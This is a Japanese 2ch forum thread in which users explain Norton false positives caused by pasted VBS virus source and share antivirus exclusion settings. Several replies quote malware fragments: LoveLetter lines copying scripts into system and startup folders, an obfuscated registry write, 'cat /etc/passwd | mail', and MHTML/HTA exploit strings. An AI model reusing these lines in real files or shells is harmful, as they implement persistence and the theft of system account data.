◎正当な理由による書き込みの削除について: 生島英之 とみられる方へ:ノートンがvbsウィルスのソースに誤反応3->画像>6枚
動画、画像抽出 ||
この掲示板へ
類似スレ
掲示板一覧 人気スレ 動画人気順
このスレへの固定リンク: http://5chb.net/r/pcqa/1109609938/ ヒント: 5chスレのurlに http ://xxxx.5chb .net/xxxx のようにb を入れるだけでここでスレ保存、閲覧できます。
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12 2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
前スレ
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ ノートンがvbsウィルスのソースに誤反応2
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/ テンプレ
>>1-10 あたり
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/197 だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.internal.html Q.ウイルスコードが貼られているのにノートン反応しない。。。
A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。
ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。
EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
http://www.eicar.org/download/eicar.com.txt / ̄| | | | | / ̄ ̄ ̄ ̄ ̄ ̄ ,― \ | | ___) | ∩∩ ∠ リュンパッチ♪ | ___) | | |_| | \______ | ___) |\___(・∀・ )_____ ヽ__)_/ \___ _____, )__ 〃 . / / / / 〃⌒i | / ./ / / .i::::::::::i ____| /⌒\./ / / | ____|;;;;;;;;;;;i [__]___| / /-、 .\_. / Uし'[_] .| | || | / /i i / | || | | ||____|____/ / .| .|\_ノ______..| || | |(_____ノ /_| |_________..| || | | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」 | || (_/ / i .| || | || |_|| / .ノ |_|| |_|| (_/
Q.2ちゃんねるの板開いただけで反応します。
A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7 ↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 ◆◇◆ 報告用テンプレ ◆◇◆ (暫定) ■>>1-9 を読みましたか? 『YES/NO』 ■2ちゃんねるの板・スレ・レス番のアドレス 『 』 ■ノートンのメッセージ(ウイルス名) 『 』 ■ブラウザの種類 『 』 ■ノートンのヴァージョン 『 』 ■ノートン以外のアンチウイルスソフト名 『 』 ■その他. 『 』 2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら
インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。
2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
よろ kak.hta';ken=wdt'START ms-its:mhtml:file://c:\
DAT落ち阻止て神戸♪
>>13 VBS.LoveLetter.Var
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/928 ウイルスコードが貼られているのにノートン反応しないって人は
>>2 見てね。
ありがとう しかしラブレター1個だけではないはず。 カーネルやネットワークも入っている。 一つ一つ解説してください。
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail
[email protected] If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
↑こういうのって最初に気づいた奴って天才だよな
あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
http://www.geocities.jp/cen_hp/index.html >>18 自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。
================================== =================/∧ =========/∧ ===============/ / λ=======/ / λ ー =============/ / λ====/ / λ ー / ===========/ / /λ =/ / /λ / =========/ / / //λ / / //λ __ =======/  ̄ ̄ ̄ \ ___ =====./ / ̄ ) ( ̄ヽ λ / ====/ /●/ \● /λ / ===/ // \ /λ ===| / /| ___|____ ==| ∧________ / //| / ==| ヽ───────〆 ///// /|\ ===| / / ////| | ===\ / / ///// =====\_ / //////__/. | ========\ ミ/ | ==========\ / ─┐ ============\ \ . ─┤ ==============\ \ . ─┘ ================\ \ ==================\ ・ \ ===================== ======================
未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが 2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません) らしいです、騒いでごめんなさい。 2chにかぎっては心配(゚听)イラネみたいです。
>>24 スレタイにウィルスコードが書いてある模様。
>>24 漏れもソレダ!!!
もう無視しまくりんぐwwwwwww
A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。 しかも板を開く事もできません。毎回そうなってしまいます。 昨日、システムをスキャンしたら確かに感染していました。「初心者の質問」板だけ毎回そうなります。 これは何でしょうか?
2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は Unix.Penguinで、ファイルを修復できません」と表示されてしまいました。何か対策は無いでしょうか? ちなみに誤作動との見分け方はありますか?
/ ̄| | | | | / ̄ ̄ ̄ ̄ ̄ ̄ ,― \ | | ___) | ∩∩ ∠ リュンパッチ♪ | ___) | | |_| | \______ | ___) |\___(・∀・ )_____ ヽ__)_/ \___ _____, )__ 〃 . / / / / 〃⌒i | / ./ / / .i::::::::::i ____| /⌒\./ / / | ____|;;;;;;;;;;;i [__]___| / /-、 .\_. / Uし'[_] .| | || | / /i i / | || | | ||____|____/ / .| .|\_ノ______..| || | |(_____ノ /_| |_________..| || | | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」 | || (_/ / i .| || | || |_|| / .ノ |_|| |_|| (_/
Open Janeをでスレを見てたらウィルスコードが張られてて ウィルス警告が出てファイルが修復出来ませんとでました。 ウィルスコードをNGワードに入れたら、NGワードが全部消えて デスクトップにあるNGWordtxtというアイコンを削除しようとすると やはりウィルス警告が出て削除できません。 スキャンをするとあるファイルの所まで来ると電源が切れてしまいます。 ウィルス名は「Bloodhound.Exploit6」と出るのですが、どうしたらいいでしょうか・・・。
>>34 ∩∩ | |_| | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ / ̄\ ・∀・) < リュンパッチ♪ .r ┤ ト、 \ \_______ |. \_/ ヽ | | __( ̄ | | | | __)_ノ ̄ ̄ ̄ ̄\ ヽ___) ノ \ ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄ || || ̄ ̄ ̄ ̄ ̄ ̄ ̄|| .|| || すみません。 1つは解決しましたがスキャンすると電源が落ちるのは直りませんので これは他のスレで聞いてみます
なんだ、最近多いと思ってたがウィルスコードのせいだったのか。 しかしこれってあぼーんされないのかな。 とりあえずここみて安心した。ありがと。
Norton Anti Virusと使ってます。 ウイルス、Unix PenguinをNGワードに登録するには どんな単語をNGワードにすればいいんですか? Unix Penguinと反応するスレ内見てもそれらしい書き込みがないので分かりません。
>>38 NGワードに登録するんではなく
Norton Anti VirusのオプションのAuto-Protectと手動スキャンでログフォルダを除外に指定しる
>>39 いや、それはやってるんですけど、反応するんです。
多分、キャッシュフォルダの方も除外指定にしないとだめっぽいです。
でも、それはセキュリティー的によくないってどっかに書いてあったんで、
NGワードに登録したいんですけど、できないんでしょうか?
>>40 2ちゃんねるブラウザのログフォルダを除外にしても2ちゃんねるブラウザで閲覧中に反応するの?
>>41 そうです。Norton Anti VirusとLive2chの組み合わせでAnti Virusの設定で
Live2chのログフォルダは除外に設定してます。
でも、Live2chで見てるとUnix Penguinだけ反応します。
これはどうだ? fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START
と思ったら、VBS.Network.Eとかいうのも反応しっちゃってるよwww どういうこと?
>>45 、-'''"´ ̄ ̄`"''''-、 / / ;;;;;;;;;;;;; \ \⌒⌒ / ..::;;● ;;;;;;;;;;;;;, ●;;;;;;;;;::ヽ ^^ |. .::;;;;;;;;;;;(__人__);;;;;;;;;;;;;;;;::.|  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ :::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::: :::::::;;;;;;;;;;;;;;;;;;;;;;;;; ::::::::::::::::∧_∧ そうやってなんでも ::::::::: ( ::;;;;;;;;:) VIPのせいにしてりゃいいさ… _.. /⌒:::;;;;;ヽ -― ―'ー'-''―-''/ / ::;;;;;;;;:| |―'''ー'-''――'`' ,, '''' . ''''' と./ゝ_;_;_ノヽつ 、、, ''" それがVIPクオリティ… ,,, '' ,,, ::;;;;;;;;;::: ,, ''''' ,,,, http://ex7.2ch.net/news4vip >>43 いや、間違えてないと思います。
なんか他のウイルスにも反応してる。。。Network.E。
>>50 いや、C\ProgramFiles\Live2ch\logになってるからあってると思います。
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!| |i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!| i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!| |i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i| i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|! |i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!| i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i |i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii| i|ii / ,,__,ニ、、 ノ( | i|i!|i| |i | Y~~/~y} `, ~ | そ、そんなー… |i !. | ,k.,.,!,.,.,r| ,! く .! i / <ニニニ'ノ \ l
>>51 除外に設定する時にサブフォルダも含めるにチェック入れた?
チン ☆ チン ☆ チン マチクタビレタ〜 チン ♪ ♪ ♪ ☆チン .☆ ジャーン! マチクタビレタ〜! ☆ チン 〃 ∧_∧ ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ヽ ___\(・∀・ #) /\_/ < うっかりさん51の報告まだ〜? チン \_/⊂ つ ‖ \__________ / ̄ ̄ ̄ ̄ ̄ ̄ ̄/| ‖ マチクタビレタ〜! |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :| /|\ | |/
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!| |i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!| i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!| |i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i| i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|! |i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!| i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i |i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii| i|ii / ,,__,ニ、、 ノ( | i|i!|i| |i | Y~~/~y} `, ~ | そ、そんなー… |i !. | ,k.,.,!,.,.,r| ,! く .! i / <ニニニ'ノ \ l
画像板から誘導されてきました。 「2chブラウザのログ保存フォルダを「除外」に設定」 というのはどうやってやるんでしょうか? 壺を使ってます。 初心者すぎてすいません。どなたかよろしくお願いいたします。
Norton Anti VirusのAuto-Protectと手動スキャンで壺フォルダを除外に指定しても、壺で閲覧中に反応します。 よくわかりません・・・orz
,:::-、 __ ,,r::::::::::::〈:::::::::) ィ::::::ヽ 〃::::::::::::;r‐''´:::::::::::::::::::::ヽ::ノ ,'::;'::::::::::::::/:::::::::::::::::::::::::::::::::::: l::::::::::::::::::l::::::::::●::::::::::::::●:::::ji |::::::::::::::::::、::::::::::::::( _●_)::::::,j:l クマー! }::::::::::::::::::::ゝ、::::::::::|∪|_ノ::;! . {::::::::::::::::::::::::::::`='=::ヽノ:::::/ ';::::::::::::ト、::::::::::::::i^i::::::::::::/ `ー--' ヽ:::::::::::l l;;;;::::ノ 【ラッキーレス】 このレスを見た人はコピペでもいいので 10分以内に3つのスレへ貼り付けてください。 そうすれば14日後好きな人から告白されるわ宝くじは当たるわ 出世しまくるわ体の悪い所全部治るわでえらい事です
今まで書き込めなかったのはノートン先生の仕業だったのか このスレのおかげで助かりました
駆除も削除も出来ないんだけどほっといていいのですか?
すいません、ノートンAV2005なんですが、Janeのログを除外に設定したいんですが AV2005のオプションを開いても「除外」っていう項目が無いのですけど どうすれば設定できるのですか? ご指導、お願い致します。
大空寺あゆ親衛隊対策 (1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック (2)「Norton AntiVirusの設定」をクリック (3)左側にある「Auto-Protect」をクリック (4)その下に出てきた「除外」をクリック (5)「除外する項目」の「新規」をクリック (6)「C:\Program Files\Live2ch\log」(Live2chの場合)と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック (7)左側にある「Auto-Protect」をクリック (8)(4)〜(6)をもう一度繰り返す (9)設定画面が消えるまで「OK」をクリックする
∧ l'vヘ ハ ┌( ;/ ト, ,、 rヘ r'^ナrジ-z __}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′ 'っヾ、r'__ |レ'ノ_C'入彳勺ソメろ_j/し-,_ `フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐' <_ゝし||フぅ(ひzメ__ゝ'l !'そ ~zヾ|て 、l レ^ //'| |'~ | | ヽl| // }| | :! || | | ,/ ,' すいません、ちょっと通りますよ | :{. || | |/ / l !|| | | / ヽ ヽ.|/ // _,r)_ j (_,( ciz ,ノこ_- __,ーヽ ん|Zゥ レz zjそ_ } ... 丿 ろ、,_!|乙7ムLそ/し-z ノ""'' 一( `う.l !シ/ア了//_⊂, /、__ ヽ ^'| |~//,/_ソ ハr^ / ...... ーl | |// //ノ /~"' 、__/ ,,,...} |/ /// {' _ `y′ 一 / r'〜(_ノ 人 =/‐- ハ 丿" ''( ヽ '' / __,, / / ‐- ''') '∨ X. }''' ....ノ j ー/ /== ノ'ヽ /=‐ r'´-ヽ } ー/'''' { ,' _,, 人 ''"`、 ノ.. '' ノ`ヽ ''"ヽ {ー / \ -'} / / \'''}` ハ 〈 )八 ( f )ハ ヽ ) (( )ノ / ノ/ ') _/
ちゃんと2ch.netとAuto-Protectと手動スキャンで除外設定しましたが VBS.Internalがしつこく警告ストロムしてきます 他に必要な手順はありますか?
>>72 ひわいな大根買い占める! ハイ! (( (`Д´) (`Д´) )) (/ /) (| |) < ̄< < ̄< ハイ! ハイ! ハイ (. `Д)_(Д´ ) ノ ノヽ | |> ノ > < ヽ ハイ! (. )_(`Д´)ノ ノ ノヽ |ヘ | ノ > < ハイ! ワァオ! (゜∀゜)_(゜∀゜)ノ ノ ノヽ |ヘ | ノノ < あるある探検隊! _(Д´ ) _(Д´ ) ヘ| |\ ヘ| |\ < < あるある探検隊! ( `Д)_ ( `Д)_ /| |ヘ /| |ヘ > > >>71 初心者はテンプレ読んでも何を言っているのかが分からなかったりするので
こういう細かい解説、感謝します。
っていうか大空寺死んで欲しい。(´・ω・`)
>>77 透明あぼーんで存在を消し去りましょう。スッキリするよ
>>78 透明あぼーんではノートンの反応はおさまらなかったんです。
なにやらメール欄に変なものを書き込んでいるようで。
>>79 >>17 のを使うと、メール欄のものでも消し去ります。
>>79 >>71 の手順でノートンの誤反応を解消し、専ブラの透明あぼーんで
糞コテやウイルス厨を見えなくするって意味。
分かりにくくてスマソ
>>80 >>81 いろいろとありがとうございました。
あいつら(大空寺とかネオとか)どうにかならないもんですかね…
XPにはNorton AntiVirusインストールできたのに、98にはできない。 98のウイルススキャン(無償)で感染ファイル35ってでたけど これをどうすればいいの?
Live2chでUnixPenguinがうざい場合 (1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック (2)「Norton AntiVirusの設定」をクリック (3)左側にある「Auto-Protect」をクリック (4)その下に出てきた「除外」をクリック (5)「除外する項目」の「新規」をクリック (6)「C:\Program Files\Live2ch\log」と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック (6)「C:\Program Files\Live2ch\temp.htm」も追加する。 (7)左側にある「Auto-Protect」をクリック (8)(4)〜(6)をもう一度繰り返す (9)設定画面が消えるまで「OK」をクリックする
あ、そうそう。
>>17 のプログラムを更新しましたです。
その他→脅威カテゴリでも「除外」が出てくるけどここは設定しなくていいの?
って、脅威カテゴリで何をしてくれるのかのかよくわからない。(NIS2005)
>>71 >>84 >(7)左側にある「Auto-Protect」をクリック
(7)左側にある「手動スキャン」をクリック ・・・じゃないのかな。
大体、「除外」する項目をAuto-Protectと手動スキャンで 分けている理由がわからない。NIS2002の設定は簡単だった。
cat /etc/passwd | mail nobody これが反応するのか?
>>89 見事にUnixPenguinと判定してくれた
>>84 Live2chでUnixPenguinがうざい場合
IEでうざい場合はどうすればよろしいのでしょうか?????
>>93 え???
ダメなんですか???
すみません・・・
初心者なもので・・・
詳しく教えていただけませんか・・・
>>94 ダメじゃないけど、専用ブラウザのほうがずっと便利。
どこまで読んだかわかるし、ログはずっと残せるし、
新着分だけダウンロードするから速いし、軽いし。
>>95 ありがとうございます。
勉強になりました。
今日はウイルスが出てかなりテンパりました(苦笑)
また明日からがんばります!
でしつこいんですが、
IEでうざい場合はどうすればよろしいのでしょうか?
>>96 IEの一時フォルダを除外すれば警告は出なくなるが、
ほかのサイトで感染してしまう。
勇気が無くて見られない画像解説スレ Part702
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/ すいません、↑のスレッドをLive2chで開いただけで
発生源:C:\Documents and Settings\kousuke\Local Settings
\Temporary Internet Files\Content.IE5\MVAP076F\woid[1].jpg
Trojan Horse
とか出るんですけど、誤反応ですか?
vbsのウィルスコードと大空寺のメール蘭攻撃は
除外しているはずなんですが。
ありえないとは思いますがて開いただけで感染したんですか?
Trojan Horse
ウィルス名:
Trojan Horse
別名:
感染場所:
.EXE ファイル
>>98 そのファイルはjpgじゃなくて、exeということらしい。
誤反応ではなくて、本物。
スレを開いただけでは感染しないけど、
その画像ファイルをIEで開くと感染する可能性がある。
>>99 おそらく原因のレスは
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/899- だと思いますが、これ画像そのものはクリックしてないんですが
ただスレッドを開いた瞬間ノートン先生が激しく怒ったス
ログを見ても
アクセスが拒否されました。
修復できませんでした。
としか出てません。
最新のウィルス定義ファイルを落とさないと駆除できないみたいですが、
これは最近のということでしょうか?
そして、今自分のPCにTemporary Internet Filesや
他の場所にウィルスが潜伏してるということはないんでしょうか?それを開くとアウツみたいな。
>>100 そこの899だよ。
でも、ノートンが隔離してるはず。
そうでなくても、IEの一時ファイルをクリアして、ごみ箱を空にするだけでいい。
>>101 レスサンクス
この.jpgブラクラは最近登場したんでしょうか
これからまた誤反応する人とかいっぱいでるんでしょうか
>>102 だから、誤反応じゃないって言ってるのに。
モノホン反応ですか、ノートン使ってる人は 反応でますよね?どうするんでしょうかこれ
あ、ノートン使ってても 画像ポップアップ有効にしてないと意味ないのか
>>104 Q.画像プレビューや画像ポップアップでアンチウィルスソフトが反応する事がある
A.画像プレビューも画像ポップアップもイメージタグで表示するだけなので、
仮にそれがウイルスだったとしても、あくまで画像として処理され、
ウイルスのコードが実行される事はないので安全。気にする事なし。
>>106 サンクス、どうもでした(=゚ω゚)ノシュ
ms-its:mhtml:file://c:\ kak.hta';ken=wdt'START この二つに激しくノートンが反応するんですが これも誤反応ですか?vbsとは違う種類みたいですが
>>109 誤反応
ただの文字列では何も出来ない。
すみません。初心者スレッドから誘導されてきました。 このスレに来る時もそうでしたが、あるスレに行くと ノートンが反応して「修復できません」と表示されます。 結果「Bloodhound.Exploit.6」を検疫することで 通常の状態に戻るようなのですが、 「Bloodhound.Exploit.6」ファイルを検疫項目の中から 右クリックで削除してもよいものでしょうか? どなたか教えてください。お願いいたします。
>>115 はい。検討します。これ↓
「Bloodhound.Exploit.6」ファイルを検疫項目の中から
右クリックで削除してもよいものでしょうか?
についてはどうでしょうか?
>>117 なるほど、そうですか。
どうもありがとうございました。
青空さんは山田砲撃たれたことないの もういっぺん感染してほしいの
>>117 >114と同様の警告がでます。
どういったウイルスなのでしょうか。
http://tmp5.2ch.net/test/read.cgi/mog2/1116912441/ >>4 で拾ったようなのですが
スレ違いだったらごめんなさい。
先日脳豚先生が誤動作したんだけど、そんときに「Bloodhound.Exploit.6」 ってのが誤検出されたんだが、誤検出だっつってんのに 納得しないやからがいる。 どっかで↑みたいなのが検出されても誤動作だって わかるように解説してるページない?
UnixPenguinと言う名のウィルスが5/6に感染していた事が先ほどわかり ファイルを削除 しかしパソを再起動したらそのファイルがありました ファイルを削除したら普通消えるのでは? 5/6に感染してたって事は、20日以上気づかないで放置って事は・・・ヤバイ?
誤反応???まじで? アタッマきたんでまたファイル消したら完全にファイル消えたよw
とあるスレを見ようとするとノートン先生が反応します。 ウィルス「MHTML Redir.Exploit」 実害は無い感じなので 反応したと思われるlogを削除しただけですが これもまた誤反応なのでしょうか?
失礼します。 IEを使用していますが、板や特定スレを開くとウイルス反応がでます。 削除しようとしても削除できないため、除外しておいていますが 問題はないんでしょうか? 削除も検疫など有効と思われることが出来ないのでしょうがなく 除外している状態です。上の方で削除のことがでてますが削除しないと問題ありますか。
>>133 多分ウイルスに似たコードを載せている為にウイルスと誤認識して反応しているだけですよ。
なんだか
>>40 と同じ症状です。
症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
安置ウイルスの役割してくれないらしいので除外したくありません。
今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
因みにOSはXPのHOMEです。アドバイスおねがいします。
>>134 レスありがとうございます。
Auto-Protectでひっかかるんですが
>>39 を読むと除外でも
問題なさそうですね・・・?大丈夫かな。
ただ
>>135 を読むと除外もよくないみたいでどうしたらいいのかとも思う。
>>135 > なんだか
>>40 と同じ症状です。
> 症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
> 専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
スレッドタイトルに反応したんじゃないかな。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 Janeの場合はfavorites.dat
ε三(; ・∀・)鯖マデオツカイの場合result.datを除外に加えてね。
> その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
> 一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
> 安置ウイルスの役割してくれないらしいので除外したくありません。
> 今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
> 専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
> 因みにOSはXPのHOMEです。アドバイスおねがいします。
ブラウザでスレを開いたんじゃないかな。
>>10 で一時ファイルの削除の仕方があるので見てね。
>>136 IEの一時ファイルを除外にしないで
2ちゃんねるブラウザのログフォルダを除外にしてください。
>>135 >>136 2ちゃんねるブラウザのより細かい設定はそれぞれの2ちゃんねるブラウザのスレで確認してね。
ソフトウェア
http://pc8.2ch.net/software/ 初歩的な質問なんですが教えてもらえませんか? 何故ノートンだけが反応するんですか? ノートンで反応したファイルを消さず、ウィルスバスターに反応するか試しましたが、反応なしでした。 【Unix Penguin】は、ウィルスなんですよね? なのに何故・・・?
>>138 ノートンは、ごく一部の文字列がファイルに含まれてるだけでウイルスと診断してるから。
判定の手抜きと言っていい。
もちろん、2ちゃんのログがウイルスとして機能する可能性は皆無。
>>140 レスありがとう
それにしてもこんなイタズラいったい誰が・・・
>>131 まったく同じような症状がでます。
自分はブラウザをjaneを使っているんですが、
ノートンのオンラインスキャンをすると、
C:...\openjanedoe-0.1.11.0\Logs\2ch\ネット関係\セキュリティ\数字.dat は
MHTMLRedir.Exploit に感染しています
と出ます。何度やっても。
これは感染しているのか?それとも誤反応なのか?
物凄い不安です。ノートン以外では反応しないので。
>>142 >>17 のでdatのスクリプトを無効化してみるといいかもです。
